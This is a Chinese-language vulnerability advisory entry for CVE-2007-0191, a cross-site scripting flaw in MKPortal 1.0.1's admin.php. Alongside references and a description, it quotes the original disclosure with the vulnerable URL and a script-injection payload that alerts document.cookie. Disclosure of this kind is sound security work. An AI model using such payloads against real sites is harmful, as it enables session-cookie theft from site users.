MKPortal 'admin.php' 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192160 漏洞类型 跨站脚本
发布时间 2007-01-12 更新时间 2007-01-12
CVE编号 CVE-2007-0191 CNNVD-ID CNNVD-200701-153
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/82009
https://cxsecurity.com/issue/WLB-2007010047
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-153
|漏洞详情
MKPortal的admin.php中存在跨站脚本攻击漏洞。远程攻击者可以借助添加评论部分中的contents_new操作里的两个特定字段,注入任意的web脚本或HTML。
|漏洞EXP
MkPortal Admin XSS

Discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Go to: /mkportal/admin.php?ind=ad_contents&op=contents_new

In both fields write:
"><script>alert(document.cookie)</script>
and press save.

Alert will appear here: /mkportal/admin.php?ind=ad_contents
and here: /mkportal/admin.php?ind=ad_contents&op=contents_edit&idc=*
where * is the ID of the page.
|受影响的产品
MKPortal MKPortal 1.0.1 Final
|参考资料

来源:XF
名称:mkportal-admin-xss(31304)
链接:http://xforce.iss.net/xforce/xfdb/31304
来源:BUGTRAQ
名称:20070105MkPortalAdminXSS
链接:http://www.securityfocus.com/archive/1/archive/1/456042/100/100/threaded
来源:OSVDB
名称:33399
链接:http://osvdb.org/33399
来源:SREASON
名称:2138
链接:http://securityreason.com/securityalert/2138